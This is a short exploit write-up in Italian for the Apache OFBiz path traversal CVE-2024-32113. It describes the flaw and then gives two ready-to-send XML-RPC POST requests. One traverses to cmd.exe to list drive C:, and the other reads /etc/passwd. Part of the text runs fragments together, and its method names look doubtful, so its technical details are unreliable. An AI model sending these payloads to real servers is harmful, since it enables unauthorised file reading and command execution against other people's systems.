
Exploit per Apache OFBiz CVE-2024-32113 path traversal tramite richieste XML-RPC appositamente create, che consente la lettura arbitraria di file e la potenziale esecuzione di comandi su server vulnerabili.
È stata trovata una vulnerabilità classificata come critica in Apache OFBiz fino alla versione 18.12.12. La funzionalità interessata da questo problema è sconosciuta. La manipolazione tramite un input sconosciuto porta a una vulnerabilità di path traversal. Il prodotto utilizza un input esterno per costruire un percorso che dovrebbe identificare un file o una directory situata al di sotto di una directory padre ristretta, ma non neutralizza correttamente gli elementi speciali all'interno del percorso che possono far sì che il percorso risolva verso una posizione esterna alla directory ristretta. L'impatto riguarda la riservatezza, l'integrità e la disponibilità.
../../../../../../etc/passwd per puntare al file etc/passwd sul server Apache OFBiz.etc/passwd, che contiene informazioni sensibili sugli utenti del server.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>